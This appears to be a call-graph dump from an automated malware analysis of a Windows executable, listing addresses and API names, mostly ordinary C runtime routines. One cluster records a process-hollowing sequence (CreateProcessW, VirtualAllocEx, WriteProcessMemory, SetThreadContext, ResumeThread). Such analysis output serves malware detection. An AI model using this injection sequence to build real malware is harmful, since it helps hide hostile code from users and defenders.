2f24f0 17881->17884 17883->17854 17885 2f2533 std::ios_base::_Init 17884->17885 17903 2f27a0 17885->17903 17888 2f258a 17907 2f2820 17888->17907 17893 2f25b9 std::ios_base::_Init 17894 2f2653 17893->17894 17895 2f2620 17893->17895 17897 2f28f0 5 API calls 17894->17897 17921 2f28f0 17895->17921 17898 2f267a 17897->17898 17899 2f28f0 5 API calls 17898->17899 17900 2f2649 17899->17900 17904 2f27bb std::ios_base::_Init 17903->17904 17905 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17904->17905 17906 2f2578 17905->17906 17906->17888 17918 2f2800 17906->17918 17908 2f2837 17907->17908 17909 2f27a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17908->17909 17910 2f25a1 17909->17910 17911 2f28a0 17910->17911 17912 2f2af0 30 API calls 17911->17912 17913 2f28ba 17912->17913 17913->17893 17919 2f7974 std::ios_base::_Init 30 API calls 17918->17919 17920 2f2812 17919->17920 17922 2f2917 std::ios_base::_Init 17921->17922 17923 2f2fd0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17922->17923 17924 2f2949 17923->17924 17928 2f30d9 17927->17928 17929 2f30f1 17928->17929 17961 2f3720 17928->17961 17929->17858 17969 2f74e4 17931->17969 17936 2f3217 17947 2f3255 17936->17947 17990 2f3ac0 17936->17990 17937 2f331a 17937->17867 17940 2f328b 18004 2f3c20 17940->18004 17983 2f7515 17947->17983 17954 2f3615 17953->17954 18104 2f4de0 17954->18104 17957 2f3640 17958 2f3654 17957->17958 17959 2f366f 17958->17959 18119 2f6940 17958->18119 17959->17863 17962 2f3762 17961->17962 17963 2f3090 39 API calls 17962->17963 17967 2f3815 17962->17967 17964 2f377d 17963->17964 17965 2f3790 17964->17965 17968 2f35f0 39 API calls 17964->17968 17966 2f3640 39 API calls 17965->17966 17966->17967 17967->17929 17968->17965 17970 2f74fa 17969->17970 17971 2f74f3 17969->17971 17973 2f3202 17970->17973 18022 2f9c58 EnterCriticalSection 17970->18022 18017 301d3f 17971->18017 17975 2f3990 17973->17975 17976 2f39ee 17975->17976 17977 2f39b2 17975->17977 17979 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17976->17979 17978 2f74e4 std::_Lockit::_Lockit 7 API calls 17977->17978 17980 2f39c3 17978->17980 17981 2f3a00 17979->17981 17982 2f7515 std::_Lockit::~_Lockit 2 API calls 17980->17982 17981->17936 17982->17976 17984 2f751f 17983->17984 17985 301d4d 17983->17985 17989 2f7532 17984->17989 18023 2f9c66 LeaveCriticalSection 17984->18023 18024 301d28 LeaveCriticalSection 17985->18024 17988 301d54 17988->17937 17989->17937 17991 2f3aff 17990->17991 17992 2f3272 17990->17992 17991->17992 18025 2f7153 17991->18025 17992->17940 18000 2f3bf0 17992->18000 17994 2f3b18 18036 2f3d50 17994->18036 18001 2f3c08 18000->18001 18068 2fa45c 18001->18068 18003 2f3c1d 18005 2f3c50 18004->18005 18006 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18005->18006 18007 2f32a5 18006->18007 18008 2f7588 18007->18008 18018 30660b std::_Locinfo::_Locinfo_dtor 5 API calls 18017->18018 18019 301d44 18018->18019 18020 301d11 std::_Lockit::_Lockit EnterCriticalSection 18019->18020 18021 301d4b 18020->18021 18021->17973 18022->17973 18023->17989 18024->17988 18026 2f7158 ___std_exception_copy 18025->18026 18027 2f7172 18026->18027 18028 2ff4ab std::ios_base::_Init EnterCriticalSection LeaveCriticalSection 18026->18028 18029 2f7174 18026->18029 18027->17994 18028->18026 18030 2f94be std::ios_base::_Init 18029->18030 18031 2f717e Concurrency::cancel_current_task 18029->18031 18032 2fa45c CallUnexpected RaiseException 18030->18032 18034 2fa45c CallUnexpected RaiseException 18031->18034 18033 2f94da 18032->18033 18035 2f7973 18034->18035 18037 2f74e4 std::_Lockit::_Lockit 7 API calls 18036->18037 18069 2fa4a4 RaiseException 18068->18069 18070 2fa476 18068->18070 18069->18003 18070->18069 18107 2f4e30 18104->18107 18108 2f4f1c 18107->18108 18109 2f4e74 18107->18109 18110 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18108->18110 18112 2fa45c CallUnexpected RaiseException 18109->18112 18113 2f4e94 18109->18113 18111 2f18d9 18110->18111 18111->17957 18112->18113 18114 2f4f30 std::ios_base::_Init 38 API calls 18113->18114 18115 2f4eef 18114->18115 18116 2f4f70 std::ios_base::_Init 30 API calls 18115->18116 18117 2f4f04 18116->18117 18118 2fa45c CallUnexpected RaiseException 18117->18118 18118->18108 18120 2f6982 18119->18120 18121 2f35f0 39 API calls 18120->18121 18122 2f698a 18120->18122 18121->18122 18122->17959 18124 2f2159 18123->18124 18127 2fd388 18124->18127 18126 2f1b3b 18126->17875 18128 2fd39c _Fputc 18127->18128 18129 2fd3be 18128->18129 18131 2fd3e5 18128->18131 18130 301ba8 _Fputc 29 API calls 18129->18130 18133 2fd3d9 _Fputc 18130->18133 18134 2feb3d 18131->18134 18133->18126 18135 2feb49 ___scrt_is_nonwritable_in_current_image 18134->18135 18136 2fd13f _Ungetc EnterCriticalSection 18135->18136 18137 2feb57 18136->18137 18138 2fe512 70 API calls 18137->18138 18139 2feb64 18138->18139 18140 2feb8c LeaveCriticalSection 18139->18140 18141 2feb75 18140->18141 18141->18133 18144 2f2244 std::ios_base::_Init 18142->18144 18143 2f13d2 18143->17824 18144->18143 18146 2f2320 18144->18146 18149 2f2350 18146->18149 18148 2f2344 18148->18143 18150 2f237b codecvt 18149->18150 18151 2f2369 18149->18151 18150->18148 18152 2f23a0 std::ios_base::_Init 29 API calls 18151->18152 18152->18150 18154 2ff303 18153->18154 18155 2ff2f1 18153->18155 18165 2ff45e 18154->18165 18156 2f9a20 _unexpected GetModuleHandleW 18155->18156 18159 2ff2f6 18156->18159 18159->18154 18180 2ff1f8 GetModuleHandleExW 18159->18180 18160 2fa2cb 18160->16743 18166 2ff46a ___scrt_is_nonwritable_in_current_image 18165->18166 18186 301d11 EnterCriticalSection 18166->18186 18168 2ff474 18187 2ff35b 18168->18187 18170 2ff481 18191 2ff49f 18170->18191 18173 2ff293 18216 2ff27a 18173->18216 18175 2ff29d 18176 2ff2b1 18175->18176 18177 2ff2a1 GetCurrentProcess TerminateProcess 18175->18177 18178 2ff1f8 _unexpected 3 API calls 18176->18178 18177->18176 18179 2ff2b9 ExitProcess 18178->18179 18181 2ff258 18180->18181 18182 2ff237 GetProcAddress 18180->18182 18183 2ff25e FreeLibrary 18181->18183 18184 2ff267 18181->18184 18182->18181 18185 2ff24b 18182->18185 18183->18184 18184->18154 18185->18181 18186->18168 18188 2ff367 ___scrt_is_nonwritable_in_current_image _unexpected 18187->18188 18190 2ff3cb _unexpected 18188->18190 18194 30102e 18188->18194 18190->18170 18215 301d28 LeaveCriticalSection 18191->18215 18193 2ff33a 18193->18160 18193->18173 18195 30103a __EH_prolog3 18194->18195 18198 3012b9 18195->18198 18197 301061 std::ios_base::_Init 18197->18190 18199 3012c5 ___scrt_is_nonwritable_in_current_image 18198->18199 18206 301d11 EnterCriticalSection 18199->18206 18201 3012d3 18207 301184 18201->18207 18206->18201 18208 30119b 18207->18208 18209 3011a3 18207->18209 18211 301308 18208->18211 18209->18208 18210 3056b7 ___free_lconv_mon 14 API calls 18209->18210 18210->18208 18214 301d28 LeaveCriticalSection 18211->18214 18213 3012f1 18213->18197 18214->18213 18215->18193 18219 308f4a 18216->18219 18218 2ff27f _unexpected 18218->18175 18220 308f59 _unexpected 18219->18220 18221 308f66 18220->18221 18223 3065c0 18220->18223 18221->18218 18224 30670d std::_Locinfo::_Locinfo_dtor 5 API calls 18223->18224 18225 3065dc 18224->18225 18225->18221 18227 2fd0bd 18226->18227 18229 2fd0cf ___scrt_uninitialize_crt 18226->18229 18228 2fd0cb 18227->18228 18231 30217a 18227->18231 18228->16736 18229->16736 18234 3022a5 18231->18234 18237 30237e 18234->18237 18238 30238a ___scrt_is_nonwritable_in_current_image 18237->18238 18245 301d11 EnterCriticalSection 18238->18245 18240 302400 18254 30241e 18240->18254 18243 302394 ___scrt_uninitialize_crt 18243->18240 18246 3022f2 18243->18246 18245->18243 18247 3022fe ___scrt_is_nonwritable_in_current_image 18246->18247 18257 2fd13f EnterCriticalSection 18247->18257 18249 302341 18269 302372 18249->18269 18250 302308 ___scrt_uninitialize_crt 18250->18249 18258 302183 18250->18258 18370 301d28 LeaveCriticalSection 18254->18370 18256 302181 18256->18228 18257->18250 18259 302198 _Fputc 18258->18259 18260 3021aa 18259->18260 18261 30219f 18259->18261 18272 3021e8 18260->18272 18263 3022a5 ___scrt_uninitialize_crt 68 API calls 18261->18263 18266 3021a5 _Fputc 18263->18266 18266->18249 18369 2fd153 LeaveCriticalSection 18269->18369 18271 302360 18271->18243 18273 3021b4 18272->18273 18274 302201 18272->18274 18273->18266 18278 308e44 18273->18278 18274->18273 18275 308e44 _Ungetc 29 API calls 18274->18275 18369->18271 18370->18256 20380 2f8b50 20381 2f8b8e 20380->20381 20382 2f8b59 20380->20382 20382->20381 20385 302127 20382->20385 20384 2f8b81 20386 302139 20385->20386 20390 302142 ___scrt_uninitialize_crt 20385->20390 20387 3022a5 ___scrt_uninitialize_crt 68 API calls 20386->20387 20388 30213f 20387->20388 20388->20384 20389 302151 20389->20384 20390->20389 20393 30242a 20390->20393 20394 302436 ___scrt_is_nonwritable_in_current_image 20393->20394 20401 2fd13f EnterCriticalSection 20394->20401 20396 302444 20397 302183 ___scrt_uninitialize_crt 68 API calls 20396->20397 20398 302455 20397->20398 20402 30247e 20398->20402 20401->20396 20405 2fd153 LeaveCriticalSection 20402->20405 20404 302178 20404->20384 20405->20404 19400 2f86a0 19401 2f86bb 19400->19401 19403 2f86cd 19401->19403 19404 2f8091 19401->19404 19407 303a8e 19404->19407 19408 303a9a ___scrt_is_nonwritable_in_current_image 19407->19408 19409 303aa1 19408->19409 19410 303ab8 19408->19410 19411 301314 __strnicoll 14 API calls 19409->19411 19420 2fd13f EnterCriticalSection 19410->19420 19413 303aa6 19411->19413 19415 3019ff __strnicoll 29 API calls 19413->19415 19414 303ac7 19421 303b0c 19414->19421 19418 2f80a3 19415->19418 19417 303ad5 19435 303b04 19417->19435 19418->19403 19420->19414 19422 303b22 19421->19422 19423 303bac _Ungetc 19421->19423 19422->19423 19424 303b50 19422->19424 19438 30f40f 19422->19438 19423->19417 19424->19423 19426 308e44 _Ungetc 29 API calls 19424->19426 19427 303b62 19426->19427 19428 303b85 19427->19428 19429 308e44 _Ungetc 29 API calls 19427->19429 19428->19423 19443 303bc2 19428->19443 19430 303b6e 19429->19430 19430->19428 19432 308e44 _Ungetc 29 API calls 19430->19432 19433 303b7a 19432->19433 19434 308e44 _Ungetc 29 API calls 19433->19434 19434->19428 19470 2fd153 LeaveCriticalSection 19435->19470 19437 303b0a 19437->19418 19439 3069f4 __strnicoll 14 API calls 19438->19439 19440 30f42c 19439->19440 19441 3056b7 ___free_lconv_mon 14 API calls 19440->19441 19442 30f436 19441->19442 19442->19424 19444 308e44 _Ungetc 29 API calls 19443->19444 19445 303be5 19444->19445 19446 308e44 _Ungetc 29 API calls 19445->19446 19453 303c0e 19445->19453 19447 303bf3 19446->19447 19449 308e44 _Ungetc 29 API calls 19447->19449 19447->19453 19450 303c01 19449->19450 19452 308e44 _Ungetc 29 API calls 19450->19452 19451 303c48 19454 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19451->19454 19452->19453 19453->19451 19456 308b36 19453->19456 19455 303cc6 19454->19455 19455->19423 19457 308b49 _Fputc 19456->19457 19460 308b70 19457->19460 19459 308b5e _Fputc 19459->19451 19461 308b85 19460->19461 19462 308bc6 19461->19462 19463 2fd5c0 _Fputc 39 API calls 19461->19463 19468 308b89 _Fputc std::bad_exception::bad_exception 19461->19468 19469 308bb2 std::bad_exception::bad_exception 19461->19469 19465 305801 _Fputc WideCharToMultiByte 19462->19465 19462->19468 19462->19469 19463->19462 19464 301ba8 _Fputc 29 API calls 19464->19468 19466 308c81 19465->19466 19467 308c97 GetLastError 19466->19467 19466->19468 19467->19468 19467->19469 19468->19459 19469->19464 19469->19468 19470->19437 20481 2f87a0 20482 2f87ac __EH_prolog3_GS 20481->20482 20485 2f87fe 20482->20485 20486 2f8818 20482->20486 20489 2f87c6 20482->20489 20497 2f804d 20485->20497 20500 30248a 20486->20500 20524 2f9dbe 20489->20524 20491 2f6840 std::ios_base::_Init 29 API calls 20491->20489 20492 2f8837 20493 2f88d4 20492->20493 20494 2f890e 20492->20494 20496 30248a 45 API calls 20492->20496 20520 2f7b8b 20492->20520 20493->20491 20494->20493 20527 303927 20494->20527 20496->20492 20540 302645 20497->20540 20501 302496 ___scrt_is_nonwritable_in_current_image 20500->20501 20502 3024a0 20501->20502 20503 3024b8 20501->20503 20505 301314 __strnicoll 14 API calls 20502->20505 20803 2fd13f EnterCriticalSection 20503->20803 20507 3024a5 20505->20507 20506 3024c3 20509 308e44 _Ungetc 29 API calls 20506->20509 20512 3024db 20506->20512 20508 3019ff __strnicoll 29 API calls 20507->20508 20519 3024b0 20508->20519 20509->20512 20510 302543 20513 301314 __strnicoll 14 API calls 20510->20513 20511 30256b 20804 3025a3 20511->20804 20512->20510 20512->20511 20515 302548 20513->20515 20517 3019ff __strnicoll 29 API calls 20515->20517 20516 302571 20814 30259b 20516->20814 20517->20519 20519->20492 20521 2f7bbf 20520->20521 20522 2f7b9b 20520->20522 20818 2f902f 20521->20818 20522->20492 20525 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20524->20525 20526 2f9dc8 20525->20526 20526->20526 20528 303933 ___scrt_is_nonwritable_in_current_image 20527->20528 20529 30393a 20528->20529 20530 30394f 20528->20530 20532 301314 __strnicoll 14 API calls 20529->20532 20877 2fd13f EnterCriticalSection 20530->20877 20533 30393f 20532->20533 20535 3019ff __strnicoll 29 API calls 20533->20535 20534 303959 20878 30399a 20534->20878 20539 30394a 20535->20539 20539->20494 20541 302651 ___scrt_is_nonwritable_in_current_image 20540->20541 20542 302658 20541->20542 20543 30266f 20541->20543 20544 301314 __strnicoll 14 API calls 20542->20544 20553 2fd13f EnterCriticalSection 20543->20553 20546 30265d 20544->20546 20548 3019ff __strnicoll 29 API calls 20546->20548 20547 30267b 20554 3026bc 20547->20554 20550 2f8058 20548->20550 20550->20489 20553->20547 20555 3026d9 20554->20555 20556 30273f 20554->20556 20558 308e44 _Ungetc 29 API calls 20555->20558 20557 302806 20556->20557 20560 308e44 _Ungetc 29 API calls 20556->20560 20590 302686 20557->20590 20609 30de7e 20557->20609 20559 3026df 20558->20559 20561 302702 20559->20561 20564 308e44 _Ungetc 29 API calls 20559->20564 20562 302754 20560->20562 20561->20556 20576 30271d 20561->20576 20565 302777 20562->20565 20567 308e44 _Ungetc 29 API calls 20562->20567 20566 3026eb 20564->20566 20565->20557 20568 30278e 20565->20568 20566->20561 20572 308e44 _Ungetc 29 API calls 20566->20572 20569 302760 20567->20569 20570 3025df 43 API calls 20568->20570 20569->20565 20575 308e44 _Ungetc 29 API calls 20569->20575 20571 302797 20570->20571 20577 2fd2bf __Getctype 39 API calls 20571->20577 20571->20590 20574 3026f7 20572->20574 20578 308e44 _Ungetc 29 API calls 20574->20578 20579 30276c 20575->20579 20576->20590 20594 3025df 20576->20594 20580 3027af 20577->20580 20578->20561 20581 308e44 _Ungetc 29 API calls 20579->20581 20582 3027d9 20580->20582 20583 3025df 43 API calls 20580->20583 20581->20565 20605 308cda 20582->20605 20585 3027c0 20583->20585 20585->20582 20587 3027c6 20585->20587 20586 3027ed 20588 301314 __strnicoll 14 API calls 20586->20588 20586->20590 20589 303927 31 API calls 20587->20589 20588->20590 20589->20590 20591 3026b4 20590->20591 20802 2fd153 LeaveCriticalSection 20591->20802 20593 3026ba 20593->20550 20595 3025a3 20594->20595 20596 3025c4 20595->20596 20597 3025af 20595->20597 20599 3025d3 20596->20599 20630 30de73 20596->20630 20598 301314 __strnicoll 14 API calls 20597->20598 20600 3025b4 20598->20600 20599->20576 20602 3019ff __strnicoll 29 API calls 20600->20602 20604 3025bf 20602->20604 20604->20576 20606 308ced _Fputc 20605->20606 20783 308d11 20606->20783 20608 308cff _Fputc 20608->20586 20610 30e018 20609->20610 20611 30e027 20610->20611 20616 30e03c 20610->20616 20612 301314 __strnicoll 14 API calls 20611->20612 20613 30e02c 20612->20613 20614 3019ff __strnicoll 29 API calls 20613->20614 20615 30e037 20614->20615 20615->20590 20616->20615 20617 30e09a 20616->20617 20618 30f40f _Ungetc 14 API calls 20616->20618 20619 308e44 _Ungetc 29 API calls 20617->20619 20618->20617 20620 30e0ca 20619->20620 20621 312d83 43 API calls 20620->20621 20622 30e0d2 20621->20622 20622->20615 20623 308e44 _Ungetc 29 API calls 20622->20623 20624 30e10c 20623->20624 20624->20615 20625 308e44 _Ungetc 29 API calls 20624->20625 20626 30e11a 20625->20626 20626->20615 20627 308e44 _Ungetc 29 API calls 20626->20627 20628 30e128 20627->20628 20629 308e44 _Ungetc 29 API calls 20628->20629 20629->20615 20631 30de89 20630->20631 20632 30de96 20631->20632 20635 30deae 20631->20635 20633 301314 __strnicoll 14 API calls 20632->20633 20634 30de9b 20633->20634 20636 3019ff __strnicoll 29 API calls 20634->20636 20637 30df0d 20635->20637 20638 30f40f _Ungetc 14 API calls 20635->20638 20645 3025d0 20635->20645 20636->20645 20639 308e44 _Ungetc 29 API calls 20637->20639 20638->20637 20640 30df26 20639->20640 20651 312d83 20640->20651 20643 308e44 _Ungetc 29 API calls 20644 30df5f 20643->20644 20644->20645 20646 308e44 _Ungetc 29 API calls 20644->20646 20645->20576 20647 30df6d 20646->20647 20647->20645 20648 308e44 _Ungetc 29 API calls 20647->20648 20649 30df7b 20648->20649 20650 308e44 _Ungetc 29 API calls 20649->20650 20650->20645 20652 312d8f ___scrt_is_nonwritable_in_current_image 20651->20652 20653 312d97 20652->20653 20656 312db2 20652->20656 20654 301327 __dosmaperr 14 API calls 20653->20654 20655 312d9c 20654->20655 20658 301314 __strnicoll 14 API calls 20655->20658 20657 312dc9 20656->20657 20659 312e04 20656->20659 20660 301327 __dosmaperr 14 API calls 20657->20660 20680 30df2e 20658->20680 20661 312e22 20659->20661 20662 312e0d 20659->20662 20663 312dce 20660->20663 20681 30d018 EnterCriticalSection 20661->20681 20664 301327 __dosmaperr 14 API calls 20662->20664 20666 301314 __strnicoll 14 API calls 20663->20666 20667 312e12 20664->20667 20672 312dd6 20666->20672 20669 301314 __strnicoll 14 API calls 20667->20669 20668 312e28 20670 312e47 20668->20670 20671 312e5c 20668->20671 20669->20672 20673 301314 __strnicoll 14 API calls 20670->20673 20682 312e9c 20671->20682 20674 3019ff __strnicoll 29 API calls 20672->20674 20677 312e4c 20673->20677 20674->20680 20676 312e57 20745 312e94 20676->20745 20678 301327 __dosmaperr 14 API calls 20677->20678 20678->20676 20680->20643 20680->20645 20681->20668 20683 312ec6 20682->20683 20684 312eae 20682->20684 20686 313208 20683->20686 20691 312f09 20683->20691 20685 301327 __dosmaperr 14 API calls 20684->20685 20687 312eb3 20685->20687 20688 301327 __dosmaperr 14 API calls 20686->20688 20689 301314 __strnicoll 14 API calls 20687->20689 20690 31320d 20688->20690 20694 312ebb 20689->20694 20692 301314 __strnicoll 14 API calls 20690->20692 20693 312f14 20691->20693 20691->20694 20698 312f44 20691->20698 20695 312f21 20692->20695 20696 301327 __dosmaperr 14 API calls 20693->20696 20694->20676 20699 3019ff __strnicoll 29 API calls 20695->20699 20697 312f19 20696->20697 20700 301314 __strnicoll 14 API calls 20697->20700 20701 312f5d 20698->20701 20702 312f98 20698->20702 20703 312f6a 20698->20703 20699->20694 20700->20695 20701->20703 20707 312f86 20701->20707 20705 3056f1 __strnicoll 15 API calls 20702->20705 20704 301327 __dosmaperr 14 API calls 20703->20704 20706 312f6f 20704->20706 20708 312fa9 20705->20708 20709 301314 __strnicoll 14 API calls 20706->20709 20748 3101bf 20707->20748 20711 3056b7 ___free_lconv_mon 14 API calls 20708->20711 20712 312f76 20709->20712 20714 312fb2 20711->20714 20715 3019ff __strnicoll 29 API calls 20712->20715 20713 3130e4 20716 313158 20713->20716 20719 3130fd GetConsoleMode 20713->20719 20717 3056b7 ___free_lconv_mon 14 API calls 20714->20717 20744 312f81 20715->20744 20718 31315c ReadFile 20716->20718 20720 312fb9 20717->20720 20721 3131d0 GetLastError 20718->20721 20722 313174 20718->20722 20719->20716 20723 31310e 20719->20723 20725 312fc3 20720->20725 20726 312fde 20720->20726 20727 313134 20721->20727 20728 3131dd 20721->20728 20722->20721 20729 31314d 20722->20729 20723->20718 20724 313114 ReadConsoleW 20723->20724 20724->20729 20730 31312e GetLastError 20724->20730 20732 301314 __strnicoll 14 API calls 20725->20732 20734 30c112 31 API calls 20726->20734 20735 30133a __dosmaperr 14 API calls 20727->20735 20727->20744 20733 301314 __strnicoll 14 API calls 20728->20733 20738 3131b0 20729->20738 20739 313199 20729->20739 20729->20744 20730->20727 20731 3056b7 ___free_lconv_mon 14 API calls 20731->20694 20736 312fc8 20732->20736 20737 3131e2 20733->20737 20734->20707 20735->20744 20740 301327 __dosmaperr 14 API calls 20736->20740 20741 301327 __dosmaperr 14 API calls 20737->20741 20738->20744 20770 313549 20738->20770 20757 3132a5 20739->20757 20740->20744 20741->20744 20744->20731 20782 30d03b LeaveCriticalSection 20745->20782 20747 312e9a 20747->20680 20749 3101d9 20748->20749 20750 3101cc 20748->20750 20753 3101e5 20749->20753 20754 301314 __strnicoll 14 API calls 20749->20754 20751 301314 __strnicoll 14 API calls 20750->20751 20752 3101d1 20751->20752 20752->20713 20753->20713 20755 310206 20754->20755 20756 3019ff __strnicoll 29 API calls 20755->20756 20756->20752 20776 3133fc 20757->20776 20760 30573f __strnicoll MultiByteToWideChar 20761 3133b9 20760->20761 20764 3133c2 GetLastError 20761->20764 20768 3132ed 20761->20768 20762 313347 20766 313301 20762->20766 20769 30c112 31 API calls 20762->20769 20763 313337 20765 301314 __strnicoll 14 API calls 20763->20765 20767 30133a __dosmaperr 14 API calls 20764->20767 20765->20768 20766->20760 20767->20768 20768->20744 20769->20766 20771 313583 20770->20771 20772 313619 ReadFile 20771->20772 20773 313614 20771->20773 20772->20773 20774 313636 20772->20774 20773->20744 20774->20773 20775 30c112 31 API calls 20774->20775 20775->20773 20777 313430 20776->20777 20778 3134a1 ReadFile 20777->20778 20779 3132bc 20777->20779 20778->20779 20780 3134ba 20778->20780 20779->20762 20779->20763 20779->20766 20779->20768 20780->20779 20781 30c112 31 API calls 20780->20781 20781->20779 20782->20747 20784 308d25 20783->20784 20792 308d35 20783->20792 20785 308d5a 20784->20785 20786 2fd5c0 _Fputc 39 API calls 20784->20786 20784->20792 20787 308d6b 20785->20787 20788 308d8e 20785->20788 20786->20785 20795 311d02 20787->20795 20790 308db6 20788->20790 20791 308e0a 20788->20791 20788->20792 20790->20792 20794 30573f __strnicoll MultiByteToWideChar 20790->20794 20793 30573f __strnicoll MultiByteToWideChar 20791->20793 20792->20608 20793->20792 20794->20792 20798 313ea3 20795->20798 20801 313ed1 _Fputc 20798->20801 20799 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20800 311d1d 20799->20800 20800->20792 20801->20799 20802->20593 20803->20506 20805 3025af 20804->20805 20808 3025c4 20804->20808 20806 301314 __strnicoll 14 API calls 20805->20806 20809 3025b4 20806->20809 20807 3025d3 20807->20516 20808->20807 20810 30de73 43 API calls 20808->20810 20811 3019ff __strnicoll 29 API calls 20809->20811 20812 3025d0 20810->20812 20813 3025bf 20811->20813 20812->20516 20813->20516 20817 2fd153 LeaveCriticalSection 20814->20817 20816 3025a1 20816->20519 20817->20816 20819 2f90e3 20818->20819 20820 2f9053 20818->20820 20840 2f57b0 20819->20840 20829 2f5850 20820->20829 20826 2f9070 _Yarn 20827 2f2350 std::ios_base::_Init 29 API calls 20826->20827 20828 2f90b1 _Yarn 20826->20828 20827->20828 20828->20522 20830 2f587e std::ios_base::_Init 20829->20830 20831 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20830->20831 20832 2f58dd 20831->20832 20833 2f2b20 20832->20833 20834 2f2b3f 20833->20834 20835 2f2b33 20833->20835 20836 2f2b5f 20834->20836 20837 2f2b4c 20834->20837 20835->20826 20851 2f2c30 20836->20851 20843 2f2bc0 20837->20843 20863 2f7974 20840->20863 20844 2f2bde 20843->20844 20845 2f2be3 20843->20845 20854 2f2c50 20844->20854 20847 2f2c30 std::ios_base::_Init 3 API calls 20845->20847 20848 2f2bee 20847->20848 20849 2f2bfb 20848->20849 20858 301a0f 20848->20858 20849->20835 20852 2f7153 std::ios_base::_Init 3 API calls 20851->20852 20853 2f2c42 20852->20853 20853->20835 20855 2f2c68 std::ios_base::_Init 20854->20855 20856 2fa45c CallUnexpected RaiseException 20855->20856 20857 2f2c7d 20856->20857 20859 301c4e __strnicoll 29 API calls 20858->20859 20860 301a1e 20859->20860 20861 301a2c __Getctype 11 API calls 20860->20861 20862 301a2b 20861->20862 20868 2f7a0d 20863->20868 20866 2fa45c CallUnexpected RaiseException 20867 2f7993 20866->20867 20871 2f67c0 20868->20871 20872 2f6801 std::bad_exception::bad_exception 20871->20872 20873 2faa5d ___std_exception_copy 29 API calls 20872->20873 20874 2f6820 20873->20874 20875 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20874->20875 20876 2f682a 20875->20876 20876->20866 20877->20534 20879 3039b2 20878->20879 20881 303a22 20878->20881 20880 308e44 _Ungetc 29 API calls 20879->20880 20884 3039b8 20880->20884 20882 303967 20881->20882 20883 30f40f _Ungetc 14 API calls 20881->20883 20889 303992 20882->20889 20883->20882 20884->20881 20885 303a0a 20884->20885 20886 301314 __strnicoll 14 API calls 20885->20886 20887 303a0f 20886->20887 20888 3019ff __strnicoll 29 API calls 20887->20888 20888->20882 20892 2fd153 LeaveCriticalSection 20889->20892 20891 303998 20891->20539 20892->20891 16664 32019e 16665 3201d4 16664->16665 16666 320321 GetPEB 16665->16666 16667 320333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 16665->16667 16670 3203ca TerminateProcess 16665->16670 16666->16667 16667->16665 16668 3203da WriteProcessMemory 16667->16668 16669 32041f 16668->16669 16671 320461 WriteProcessMemory Wow64SetThreadContext ResumeThread 16669->16671 16672 320424 WriteProcessMemory 16669->16672 16670->16665 16672->16669 21035 2f8990 21036 2f89a4 21035->21036 21037 2f8bf5 69 API calls 21036->21037 21042 2f89ff 21036->21042 21038 2f89cf 21037->21038 21039 2f89ec 21038->21039 21040 3013c4 67 API calls 21038->21040 21038->21042 21039->21042 21043 3025ea 21039->21043 21040->21039 21044 3025f5 21043->21044 21045 30260a 21043->21045 21046 301314 __strnicoll 14 API calls 21044->21046 21047 302612 21045->21047 21048 302627 21045->21048 21049 3025fa 21046->21049 21050 301314 __strnicoll 14 API calls 21047->21050 21057 30c336 21048->21057 21052 3019ff __strnicoll 29 API calls 21049->21052 21053 302617 21050->21053 21054 302605 21052->21054 21055 3019ff __strnicoll 29 API calls 21053->21055 21054->21042 21056 302622 21055->21056 21056->21042 21058 30c34a _Fputc 21057->21058 21061 30c8df 21058->21061 21060 30c356 _Fputc 21060->21056 21062 30c8eb ___scrt_is_nonwritable_in_current_image 21061->21062 21063 30c8f2 21062->21063 21064 30c915 21062->21064 21065 301ba8 _Fputc 29 API calls 21063->21065 21072 2fd13f EnterCriticalSection 21064->21072 21068 30c90b 21065->21068 21067 30c923 21073 30c73e 21067->21073 21068->21060 21070 30c932 21086 30c964 21070->21086 21072->21067 21074 30c775 21073->21074 21075 30c74d 21073->21075 21076 308e44 _Ungetc 29 API calls 21074->21076 21077 301ba8 _Fputc 29 API calls 21075->21077 21078 30c77e 21076->21078 21085 30c768 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21077->21085 21079 30c170 33 API calls 21078->21079 21080 30c79c 21079->21080 21081 30c828 21080->21081 21083 30c83f 21080->21083 21080->21085 21082 30c3c8 34 API calls 21081->21082 21082->21085 21084 30c573 33 API calls 21083->21084 21083->21085 21084->21085 21085->21070 21089 2fd153 LeaveCriticalSection 21086->21089 21088 30c96c 21088->21068 21089->21088 21113 305bf0 21114 305bfb 21113->21114 21118 305c0b 21113->21118 21119 305cf5 21114->21119 21117 3056b7 ___free_lconv_mon 14 API calls 21117->21118 21120 305d10 21119->21120 21121 305d0a 21119->21121 21123 3056b7 ___free_lconv_mon 14 API calls 21120->21123 21122 3056b7 ___free_lconv_mon 14 API calls 21121->21122 21122->21120 21124 305d1c 21123->21124 21125 3056b7 ___free_lconv_mon 14 API calls 21124->21125 21126 305d27 21125->21126 21127 3056b7 ___free_lconv_mon 14 API calls 21126->21127 21128 305d32 21127->21128 21129 3056b7 ___free_lconv_mon 14 API calls 21128->21129 21130 305d3d 21129->21130 21131 3056b7 ___free_lconv_mon 14 API calls 21130->21131 21132 305d48 21131->21132 21133 3056b7 ___free_lconv_mon 14 API calls 21132->21133 21134 305d53 21133->21134 21135 3056b7 ___free_lconv_mon 14 API calls 21134->21135 21136 305d5e 21135->21136 21137 3056b7 ___free_lconv_mon 14 API calls 21136->21137 21138 305d69 21137->21138 21139 3056b7 ___free_lconv_mon 14 API calls 21138->21139 21140 305d77 21139->21140 21145 305e6e 21140->21145 21146 305e7a ___scrt_is_nonwritable_in_current_image 21145->21146 21161 301d11 